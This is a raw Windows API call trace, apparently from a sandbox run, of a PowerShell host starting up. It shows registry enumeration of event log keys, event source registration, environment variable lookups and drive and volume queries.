	[0382.264] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d0ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d0e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d0ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d0e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.264] CoTaskMemFree (pv=0x0) 
	[0382.264] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.264] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x0, lpName=0x3c94a0, lpcchName=0x14d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.264] CoTaskMemFree (pv=0x3c94a0) 
	[0382.264] CoTaskMemFree (pv=0x0) 
	[0382.264] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.264] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x1, lpName=0x3c94a0, lpcchName=0x14d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.264] CoTaskMemFree (pv=0x3c94a0) 
	[0382.264] CoTaskMemFree (pv=0x0) 
	[0382.264] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.264] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x2, lpName=0x3c94a0, lpcchName=0x14d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.265] CoTaskMemFree (pv=0x3c94a0) 
	[0382.265] CoTaskMemFree (pv=0x0) 
	[0382.265] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.265] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x3, lpName=0x3c94a0, lpcchName=0x14d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.265] CoTaskMemFree (pv=0x3c94a0) 
	[0382.265] CoTaskMemFree (pv=0x0) 
	[0382.265] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.265] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x4, lpName=0x3c94a0, lpcchName=0x14d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.265] CoTaskMemFree (pv=0x3c94a0) 
	[0382.265] CoTaskMemFree (pv=0x0) 
	[0382.265] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.265] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x5, lpName=0x3c94a0, lpcchName=0x14d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.265] CoTaskMemFree (pv=0x3c94a0) 
	[0382.265] CoTaskMemFree (pv=0x0) 
	[0382.265] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.265] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x6, lpName=0x3c94a0, lpcchName=0x14d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.265] CoTaskMemFree (pv=0x3c94a0) 
	[0382.265] CoTaskMemFree (pv=0x0) 
	[0382.265] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.265] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x7, lpName=0x3c94a0, lpcchName=0x14d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.265] CoTaskMemFree (pv=0x3c94a0) 
	[0382.265] CoTaskMemFree (pv=0x0) 
	[0382.265] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.265] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x8, lpName=0x3c94a0, lpcchName=0x14d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0382.266] CoTaskMemFree (pv=0x3c94a0) 
	[0382.266] CoTaskMemFree (pv=0x0) 
	[0382.266] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x304) returned 0x0
	[0382.266] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x0) returned 0x2
	[0382.266] RegOpenKeyExW (in: hKey=0x360, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x364) returned 0x0
	[0382.266] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x0) returned 0x2
	[0382.266] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x368) returned 0x0
	[0382.266] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x0) returned 0x2
	[0382.266] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x36c) returned 0x0
	[0382.266] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x0) returned 0x2
	[0382.266] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x370) returned 0x0
	[0382.266] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x0) returned 0x2
	[0382.266] RegOpenKeyExW (in: hKey=0x360, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x374) returned 0x0
	[0382.267] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x0) returned 0x2
	[0382.267] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x378) returned 0x0
	[0382.267] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x0) returned 0x2
	[0382.267] RegOpenKeyExW (in: hKey=0x360, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x37c) returned 0x0
	[0382.267] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x0) returned 0x2
	[0382.267] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x380) returned 0x0
	[0382.267] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1d8 | out: phkResult=0x14d1d8*=0x384) returned 0x0
	[0382.267] RegCloseKey (hKey=0x384) returned 0x0
	[0382.268] RegCloseKey (hKey=0x360) returned 0x0
	[0382.269] RegCloseKey (hKey=0x380) returned 0x0
	[0382.273] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b7f0008
	[0382.597] ReportEventW (hEventLog=0x1b7f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2c33728*="WSMan", lpRawData=0x2c33498) returned 1
	[0382.598] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0382.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0382.598] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0382.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.600] CoTaskMemAlloc (cb=0x804) returned 0x1b723a00
	[0382.600] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b723a00, nSize=0x14d468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d468) returned 0x1
	[0382.601] CoTaskMemFree (pv=0x1b723a00) 
	[0382.601] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.601] GetUserNameW (in: lpBuffer=0x3c94a0, pcbBuffer=0x14d4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d4a8) returned 1
	[0382.602] CoTaskMemFree (pv=0x3c94a0) 
	[0382.602] ReportEventW (hEventLog=0x1b7f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2c39108*="Alias", lpRawData=0x2c38e98) returned 1
	[0382.603] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0382.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0382.603] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0382.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.605] CoTaskMemAlloc (cb=0x804) returned 0x1b723a00
	[0382.605] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b723a00, nSize=0x14d468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d468) returned 0x1
	[0382.606] CoTaskMemFree (pv=0x1b723a00) 
	[0382.606] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.606] GetUserNameW (in: lpBuffer=0x3c94a0, pcbBuffer=0x14d4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d4a8) returned 1
	[0382.606] CoTaskMemFree (pv=0x3c94a0) 
	[0382.607] ReportEventW (hEventLog=0x1b7f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2c3e700*="Environment", lpRawData=0x2c3e490) returned 1
	[0382.607] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0382.608] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0382.608] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0382.608] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0382.608] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0382.608] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0382.608] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0382.608] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0382.608] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0382.608] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x14d010, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0382.608] SetErrorMode (uMode=0x1) returned 0x1
	[0382.609] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x14d220 | out: lpFileInformation=0x14d220*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0382.609] SetErrorMode (uMode=0x1) returned 0x1
	[0382.609] GetLogicalDrives () returned 0x4
	[0382.610] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0382.610] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0382.610] SetErrorMode (uMode=0x1) returned 0x1
	[0382.611] CoTaskMemAlloc (cb=0x68) returned 0x1b702ee0
	[0382.611] CoTaskMemAlloc (cb=0x68) returned 0x1b702b60
	[0382.611] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b702ee0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x14d1f0, lpMaximumComponentLength=0x14d1ec, lpFileSystemFlags=0x14d1e8, lpFileSystemNameBuffer=0x1b702b60, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14d1f0*=0x9c354b42, lpMaximumComponentLength=0x14d1ec*=0xff, lpFileSystemFlags=0x14d1e8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0382.611] CoTaskMemFree (pv=0x1b702ee0) 
	[0382.611] CoTaskMemFree (pv=0x1b702b60) 
	[0382.611] SetErrorMode (uMode=0x1) returned 0x1
	[0382.611] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0382.612] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cf30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0382.612] SetErrorMode (uMode=0x1) returned 0x1
	[0382.612] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d190 | out: lpFileInformation=0x14d190*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0382.612] SetErrorMode (uMode=0x1) returned 0x1
	[0382.612] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cf30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0382.612] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14cde0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0382.612] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0382.612] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0382.613] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0382.613] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cd60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0382.613] SetErrorMode (uMode=0x1) returned 0x1
	[0382.613] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14cfc0 | out: lpFileInformation=0x14cfc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0382.613] SetErrorMode (uMode=0x1) returned 0x1
	[0382.613] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cd60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0382.613] SetErrorMode (uMode=0x1) returned 0x1
	[0382.613] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14cfc0 | out: lpFileInformation=0x14cfc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0382.613] SetErrorMode (uMode=0x1) returned 0x1
	[0382.614] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14ce00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0382.614] SetErrorMode (uMode=0x1) returned 0x1
	[0382.614] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d060 | out: lpFileInformation=0x14d060*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0382.614] SetErrorMode (uMode=0x1) returned 0x1
	[0382.614] CoTaskMemAlloc (cb=0x804) returned 0x1b723a00
	[0382.614] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b723a00, nSize=0x14d468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d468) returned 0x1
	[0382.614] CoTaskMemFree (pv=0x1b723a00) 
	[0382.615] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.615] GetUserNameW (in: lpBuffer=0x3c94a0, pcbBuffer=0x14d4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d4a8) returned 1
	[0382.615] CoTaskMemFree (pv=0x3c94a0) 
	[0382.615] ReportEventW (hEventLog=0x1b7f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2c457f0*="FileSystem", lpRawData=0x2c45580) returned 1
	[0382.615] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0382.615] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0382.615] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0382.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.616] CoTaskMemAlloc (cb=0x804) returned 0x1b723a00
	[0382.616] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b723a00, nSize=0x14d468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d468) returned 0x1
	[0382.617] CoTaskMemFree (pv=0x1b723a00) 
	[0382.617] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0382.617] GetUserNameW (in: lpBuffer=0x3c94a0, pcbBuffer=0x14d4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d4a8) returned 1
	[0382.617] CoTaskMemFree (pv=0x3c94a0) 
	[0382.617] ReportEventW (hEventLog=0x1b7f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2c4b030*="Function", lpRawData=0x2c4adc0) returned 1
	[0382.618] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff9c0
	[0382.618] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0382.618] CoTaskMemFree (pv=0x1b6ff9c0) 
	[0382.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.027] CoTaskMemAlloc (cb=0x804) returned 0x1b723a00
	[0383.027] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b723a00, nSize=0x14d468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d468) returned 0x1
